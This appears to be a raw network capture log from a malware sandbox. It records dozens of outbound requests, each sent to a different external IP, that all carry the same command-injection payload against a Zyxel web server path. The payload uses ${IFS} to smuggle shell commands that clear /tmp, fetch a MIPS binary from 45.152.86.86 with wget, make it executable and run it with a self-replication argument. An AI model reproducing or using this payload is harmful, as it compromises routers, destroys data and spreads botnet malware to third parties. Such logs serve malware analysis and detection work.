                                        Mar 31, 2024 09:21:59.387394905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6547192.168.2.234815040.220.12.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387434006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6548192.168.2.2332964193.90.117.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387473106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6549192.168.2.235646053.222.178.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387515068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6550192.168.2.2358004121.82.63.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387548923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6551192.168.2.2340132200.214.168.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387588024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6552192.168.2.2358966125.238.2.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387635946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6553192.168.2.235758482.160.93.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387681007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6554192.168.2.2356008160.78.231.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387728930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6555192.168.2.2346584193.153.225.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387768984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6556192.168.2.235555045.156.93.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387801886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6557192.168.2.235884082.2.162.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387857914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6558192.168.2.235487625.10.222.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387895107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6559192.168.2.234912885.165.100.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387940884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6560192.168.2.233766245.167.92.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387968063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6561192.168.2.235949437.190.106.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388015985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6562192.168.2.2346496155.89.138.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388055086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6563192.168.2.2351982123.69.249.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388087988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6564192.168.2.2337606205.221.224.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388144970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6565192.168.2.2352766223.66.29.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388184071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6566192.168.2.2338194166.15.187.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388237953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6567192.168.2.234566424.144.164.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388248920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6568192.168.2.235600653.90.121.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388289928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6569192.168.2.235536676.212.66.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388318062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6570192.168.2.2334248198.68.234.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388360023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6571192.168.2.236048881.90.230.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388408899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6572192.168.2.234915452.209.108.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388458967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6573192.168.2.2351956141.95.239.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388500929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6574192.168.2.235830063.53.210.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388545036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6575192.168.2.2354266217.207.165.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388580084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6576192.168.2.234794859.99.30.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388628006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6577192.168.2.233812889.226.32.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388669014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6578192.168.2.235415058.245.102.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388719082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6579192.168.2.2336286121.153.198.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388746977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6580192.168.2.233563035.27.141.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388797998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6581192.168.2.234123225.33.84.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388832092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6582192.168.2.2349048211.102.10.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388885021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6583192.168.2.235730637.205.161.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388916016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6584192.168.2.233517891.48.147.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.388972998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6585192.168.2.233445290.114.33.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389019012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6586192.168.2.2333116125.194.77.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389055014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6587192.168.2.2355168167.227.33.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389098883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6588192.168.2.2351568223.109.82.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389141083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6589192.168.2.2350546134.10.193.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389203072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6590192.168.2.2358034155.115.115.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389225006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6591192.168.2.234764241.118.232.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389255047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6592192.168.2.2338664163.10.175.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389297962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6593192.168.2.2336446140.97.221.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389332056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6594192.168.2.235667051.200.185.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389359951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6595192.168.2.23426148.34.124.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389394999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6596192.168.2.2348406123.139.131.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389442921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6597192.168.2.235350444.196.166.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389493942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6598192.168.2.2348146187.133.63.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389553070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6599192.168.2.23423982.139.50.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389586926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6600192.168.2.2354998150.170.10.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389628887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6601192.168.2.234946892.48.184.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389667034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6602192.168.2.233768888.183.27.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389703989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6603192.168.2.2353588172.13.113.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389744997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6604192.168.2.235809462.202.215.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389794111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6605192.168.2.234024085.184.54.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389827967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6606192.168.2.2340826191.217.29.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389864922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6607192.168.2.233834660.236.72.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389904022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6608192.168.2.233452673.3.117.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389934063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6609192.168.2.2351182148.125.5.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.389972925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6610192.168.2.233827061.109.202.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390031099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6611192.168.2.233449049.71.249.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390072107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6612192.168.2.2359212210.222.219.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390116930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6613192.168.2.235195081.109.154.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390170097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6614192.168.2.2352570220.177.143.4443
                                        TimestampBytes transferredDirectionData
